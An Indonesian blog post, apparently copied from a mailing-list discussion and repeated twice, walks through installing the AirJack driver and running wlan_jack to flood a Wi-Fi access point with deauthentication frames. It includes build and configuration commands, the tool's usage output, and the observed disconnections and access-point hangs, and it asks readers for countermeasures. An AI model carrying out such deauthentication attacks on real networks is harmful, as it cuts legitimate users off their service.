Penulis tidak bertanggung jawab atas semua tindakan yang akan dilakukan oleh siapa saja yang mencoba mempraktikkan atau melakukan serangan karena membaca artikel ini sehingga menyebabkan kerugian seseorang atau lembaga tertentu. Use your own risk Oks..
Tutorial dan demo ini ditulis untuk melengkapi diskusi di milis jogja-wireless@yahoogroups.com mengenai penggunaan tools airjack. Airjack merupakan salah satu tools wardriving yang biasa digunakan oleh para cracker untuk melakukan aksinya seperti MITM ( Man In The Middle ) attack dan DoS ( Denial Of Services). Kali ini penulis akan menjelaskan langkah-langkan untuk melakukan serangan DoS pada sebuah Access Point, sedangkan untuk serangan MITM attack akan di jelaskan pada episode selanjutnya :)
Airjack hanya bekerja pada kartu wireless pcmcia berchipset prism. Airjack sebenarnya berupa module atau driver yang digunakan pada kernel linux agar kartu wireless tersebut dapat digunakan, sama halnya seperti wlan-ng, hostap, orinoco dll. Keistimewaan module Airjack yang akan kita bahas kali ini adalah mampu melakukan DoS pada AP dengan cara menggunakan MAC (BSSID) suatu Access Point ( biasanya MAC dari target AP ) dan melakukan pengiriman frame frame deauthentikasi secara terus-menerus ke alamat broadcast atau ke mac address tertentu sehingga client dari AP tersebut tidak dapat melakukan re-assosiate ( mencoba terhubung kembali ). Alhasil client-client yang tadinya dapat terhubung jaringan melalui Access Point tersebut akan terputus.
Perlu diketahui bahwa driver airjack hanya dapat digunakan pada sistem operasi Linux dengan kernel 2.4.x
Adapun peralatan peralatan atau hardware yang penulis gunakan dalam pembahasan dibawah ini adalah Laptop Dell Latitude C400 dengan OS Linux Mandrake 10.0 kernel 2.4.27, PCMCIA Card Wireless Samsung SWL-2100N chipset Intersil Prism2 nic 8002 firmware pri 0.3.0 sta 1.7.1 ( setelah saya upgrade dari sta 0.8.0 ), USB Wireless Senao NL2511UB4, Access Point Compex WP11B+ sebagai target, PC Desktop sebagai client .
Sebelum melakukan percobaan, perlu kita siapkan hardware dan software yang dibutuhkan. Software utama yakni driver airjack. Penulis sarankan menggunakan driver terbaru dari airjack, dapat di download dari http://sf.net. Karena airjack hanya bekerja pada kartu pcmcia, maka penulis sarankan menggunakan pcmcia-cs terbaru juga.
Instalasi Driver/Module :
#tar -jxvf airjack-v0.6.6b-alpha.tar.bz2
#cd airjack-v0.6.6b-alpha
#vi Makefile ( sesuaikan dengan source pcmcia-cs yang Anda gunakan )
CC=gcc
PCMCIADIR=/usr/src/pcmcia-cs-3.2.8/include
KERNELDIR=/lib/modules/`uname -r`/build/include
MODULESDIR=/lib/modules/`uname -r`
... dst
#make all
#make install
#cd tools
#make all
Setelah instalasi module, kita akan meng-compile tools yang sudah disediakan bersama source driver airjack tersebut, tetapi karena pada tools dari modules terbaru ini tidak lagi menyediakan source wlan_jack. Maka kita perlu mendownload source tools wlan_jack yang terdapat pada source driver airjack versi yang lebih lama yakni airjack-v0.6.2-alpha.tar.bz2
#tar -jxvf airjack-v0.6.2-alpha.tar.bz2
#cd airjack-v0.6.2-alpha/tools
#make wlan_jack
Setelah perintah diatas, maka tools wlan_jack sudah tercompile dan siap digunakan. Tapi sebelumnya kita harus melakukan konfigurasi pada services pcmcia.
#cd /etc/pcmcia
#vi pcmcia.conf
device "airjack_cs"
class "network" module "airjack_cs"
card "Samsung SWL2100-N 11Mb/s WLAN Card"
manfid 0x0250, 0x0002
bind "airjack_cs"
#/etc/init.d/pcmcia restart
Shutting down PCMCIA services: done.
Starting PCMCIA services: using yenta_socket instead of i82365
cardmgr[2222]: watching 1 socket
done.
Sebelum melakukan aksi, kita harus mendapatkan beberapa informasi dari AP target kita tersebut antara lain BSSID atau MAC address si target, dan channel yang digunakan. Untuk memperoleh hal tersebut tidaklah susah, cukup menjalankan tools seperti kismet, airsnort atau bahkan dengan netstumbler kita dapat dengan mudah mendapatkan informasi MAC address dan channel yang digunakan si target. Karena penulis hanya melakukan demonstrasi dengan milik sendiri, maka penulis dengan mudah membaca MAC address yang terdapat di sisi bagian bawah AP Compex tersebut :p, dan mengkonfigurasi channel sesuka hati hehehe ( gak curang lho .. )
Oks.. thats intermezo..
Menjalankan wlan_jack sangat mudah.. its too simple..
#cd /path/to/airjack-v0.6.2-alpha/tools
#./wlan_jack
Wlan Jack: 802.11b DOS attack.
Usage: ./wlan_jack -b[ -v ] [ -c ] [ -i ]
-b: bssid, the mac address of the access point (e.g. 00:de:ad:be:ef:00)
-v: victum mac address, defaults to broadcast address.
-c: channel number (1-14) that the access point is on, defaults to current.
-i: the name of the AirJack interface to use (defaults to aj0).
WLAN_jack in AcTioN
Oh iya.. mungkin Anda akan menemui hal spt diatas ini, dimana ada pesan Network is down, hal tersebut disebabkan aj0 belum up, untuk meng-upkannya ketik ifconfig aj0 up .
Beberapa detik kemudian ( SSID yang terlihat di netstumbler ada 2, bagian pertama adalah Fake AP yang dijalankan otomatis si airjack, sedangkan essid yang kedua yakni "compex" akan berubah ubah secara bergantian menjadi "AirJack"
Setelah dilakukan Cancel ( Ctrl + c ) pada command wlan_jack, si Client dapat terhubung kembali ke jaringan, anehnya essid yang digunakan bukan lagi "compex", melainkan "AirJack".
Hasil akhir.. setelah wlan_jack di stop,( di cancel ), si Client dapat terhubung kembali.. meski bukan lagi menggunakan essid compex.
Demikian sedikit sharing pengalaman penulis menggunakan airjack khususnya serangan DoS wlan_jack.
Jika ada pertanyaan silakan tanyakan langsung di milis jogja-wireless@yahoogroups.com
Sekedar tambahan, serangan terhadap beberapa jenis AP menghasilkan pengaruh yang berbeda beda, pada Product AP Dlink dan 3Com menyebabkan AP tersebut sama sekali down/nge-hang dan harus di lakukan reset/restart secara manual.
Client dengan WinXP SP2 dan Linux bahkan mungkin fBSD sekalipun akan mengalami hal yang sama seperti diatas.
PENTINGGGG !!!!
Saya belum menemukan countermeasure dari serangan ini jika dilakukan terhadap Client Windows dan AP yang belum support "automatic change channel" atau "automatic change mac" , saya sudah mencoba dengan security 802.1x, hasilnya nihil karena airjack memang bekerja di layer 1 sedang 802.1x di layer 2 dan VPN di layer 3. Oleh karena itu :::::: please deh.. :) jangan digunakan untuk kejahatan jika Anda tidak ingin "busted" . Silakan belajar sepuasnya... but gunakan untuk kebajikan.. Oks
Jika ada pembaca dari artikel ini yang mengetahui countermeasure dari serangan ini untuk AP yang belum support hal hal spt diatas, let me know how ...
sumber :Wow.. Mas Ryo di jogja-wireless@yahoogroups.com
Tutorial dan demo ini ditulis untuk melengkapi diskusi di milis jogja-wireless@yahoogroups.com mengenai penggunaan tools airjack. Airjack merupakan salah satu tools wardriving yang biasa digunakan oleh para cracker untuk melakukan aksinya seperti MITM ( Man In The Middle ) attack dan DoS ( Denial Of Services). Kali ini penulis akan menjelaskan langkah-langkan untuk melakukan serangan DoS pada sebuah Access Point, sedangkan untuk serangan MITM attack akan di jelaskan pada episode selanjutnya :)
Airjack hanya bekerja pada kartu wireless pcmcia berchipset prism. Airjack sebenarnya berupa module atau driver yang digunakan pada kernel linux agar kartu wireless tersebut dapat digunakan, sama halnya seperti wlan-ng, hostap, orinoco dll. Keistimewaan module Airjack yang akan kita bahas kali ini adalah mampu melakukan DoS pada AP dengan cara menggunakan MAC (BSSID) suatu Access Point ( biasanya MAC dari target AP ) dan melakukan pengiriman frame frame deauthentikasi secara terus-menerus ke alamat broadcast atau ke mac address tertentu sehingga client dari AP tersebut tidak dapat melakukan re-assosiate ( mencoba terhubung kembali ). Alhasil client-client yang tadinya dapat terhubung jaringan melalui Access Point tersebut akan terputus.
Perlu diketahui bahwa driver airjack hanya dapat digunakan pada sistem operasi Linux dengan kernel 2.4.x
Adapun peralatan peralatan atau hardware yang penulis gunakan dalam pembahasan dibawah ini adalah Laptop Dell Latitude C400 dengan OS Linux Mandrake 10.0 kernel 2.4.27, PCMCIA Card Wireless Samsung SWL-2100N chipset Intersil Prism2 nic 8002 firmware pri 0.3.0 sta 1.7.1 ( setelah saya upgrade dari sta 0.8.0 ), USB Wireless Senao NL2511UB4, Access Point Compex WP11B+ sebagai target, PC Desktop sebagai client .
Sebelum melakukan percobaan, perlu kita siapkan hardware dan software yang dibutuhkan. Software utama yakni driver airjack. Penulis sarankan menggunakan driver terbaru dari airjack, dapat di download dari http://sf.net. Karena airjack hanya bekerja pada kartu pcmcia, maka penulis sarankan menggunakan pcmcia-cs terbaru juga.
Instalasi Driver/Module :
#tar -jxvf airjack-v0.6.6b-alpha.tar.bz2
#cd airjack-v0.6.6b-alpha
#vi Makefile ( sesuaikan dengan source pcmcia-cs yang Anda gunakan )
CC=gcc
PCMCIADIR=/usr/src/pcmcia-cs-3.2.8/include
KERNELDIR=/lib/modules/`uname -r`/build/include
MODULESDIR=/lib/modules/`uname -r`
... dst
#make all
#make install
#cd tools
#make all
Setelah instalasi module, kita akan meng-compile tools yang sudah disediakan bersama source driver airjack tersebut, tetapi karena pada tools dari modules terbaru ini tidak lagi menyediakan source wlan_jack. Maka kita perlu mendownload source tools wlan_jack yang terdapat pada source driver airjack versi yang lebih lama yakni airjack-v0.6.2-alpha.tar.bz2
#tar -jxvf airjack-v0.6.2-alpha.tar.bz2
#cd airjack-v0.6.2-alpha/tools
#make wlan_jack
Setelah perintah diatas, maka tools wlan_jack sudah tercompile dan siap digunakan. Tapi sebelumnya kita harus melakukan konfigurasi pada services pcmcia.
#cd /etc/pcmcia
#vi pcmcia.conf
device "airjack_cs"
class "network" module "airjack_cs"
card "Samsung SWL2100-N 11Mb/s WLAN Card"
manfid 0x0250, 0x0002
bind "airjack_cs"
#/etc/init.d/pcmcia restart
Shutting down PCMCIA services: done.
Starting PCMCIA services: using yenta_socket instead of i82365
cardmgr[2222]: watching 1 socket
done.
Sebelum melakukan aksi, kita harus mendapatkan beberapa informasi dari AP target kita tersebut antara lain BSSID atau MAC address si target, dan channel yang digunakan. Untuk memperoleh hal tersebut tidaklah susah, cukup menjalankan tools seperti kismet, airsnort atau bahkan dengan netstumbler kita dapat dengan mudah mendapatkan informasi MAC address dan channel yang digunakan si target. Karena penulis hanya melakukan demonstrasi dengan milik sendiri, maka penulis dengan mudah membaca MAC address yang terdapat di sisi bagian bawah AP Compex tersebut :p, dan mengkonfigurasi channel sesuka hati hehehe ( gak curang lho .. )
Oks.. thats intermezo..
Menjalankan wlan_jack sangat mudah.. its too simple..
#cd /path/to/airjack-v0.6.2-alpha/tools
#./wlan_jack
Wlan Jack: 802.11b DOS attack.
Usage: ./wlan_jack -b
-b: bssid, the mac address of the access point (e.g. 00:de:ad:be:ef:00)
-v: victum mac address, defaults to broadcast address.
-c: channel number (1-14) that the access point is on, defaults to current.
-i: the name of the AirJack interface to use (defaults to aj0).
WLAN_jack in AcTioN
Oh iya.. mungkin Anda akan menemui hal spt diatas ini, dimana ada pesan Network is down, hal tersebut disebabkan aj0 belum up, untuk meng-upkannya ketik ifconfig aj0 up .
Beberapa detik kemudian ( SSID yang terlihat di netstumbler ada 2, bagian pertama adalah Fake AP yang dijalankan otomatis si airjack, sedangkan essid yang kedua yakni "compex" akan berubah ubah secara bergantian menjadi "AirJack"
Setelah dilakukan Cancel ( Ctrl + c ) pada command wlan_jack, si Client dapat terhubung kembali ke jaringan, anehnya essid yang digunakan bukan lagi "compex", melainkan "AirJack".
Hasil akhir.. setelah wlan_jack di stop,( di cancel ), si Client dapat terhubung kembali.. meski bukan lagi menggunakan essid compex.
Demikian sedikit sharing pengalaman penulis menggunakan airjack khususnya serangan DoS wlan_jack.
Jika ada pertanyaan silakan tanyakan langsung di milis jogja-wireless@yahoogroups.com
Sekedar tambahan, serangan terhadap beberapa jenis AP menghasilkan pengaruh yang berbeda beda, pada Product AP Dlink dan 3Com menyebabkan AP tersebut sama sekali down/nge-hang dan harus di lakukan reset/restart secara manual.
Client dengan WinXP SP2 dan Linux bahkan mungkin fBSD sekalipun akan mengalami hal yang sama seperti diatas.
PENTINGGGG !!!!
Saya belum menemukan countermeasure dari serangan ini jika dilakukan terhadap Client Windows dan AP yang belum support "automatic change channel" atau "automatic change mac" , saya sudah mencoba dengan security 802.1x, hasilnya nihil karena airjack memang bekerja di layer 1 sedang 802.1x di layer 2 dan VPN di layer 3. Oleh karena itu :::::: please deh.. :) jangan digunakan untuk kejahatan jika Anda tidak ingin "busted" . Silakan belajar sepuasnya... but gunakan untuk kebajikan.. Oks
Jika ada pembaca dari artikel ini yang mengetahui countermeasure dari serangan ini untuk AP yang belum support hal hal spt diatas, let me know how ...
sumber :Wow.. Mas Ryo di jogja-wireless@yahoogroups.com
0 komentar:
Posting Komentar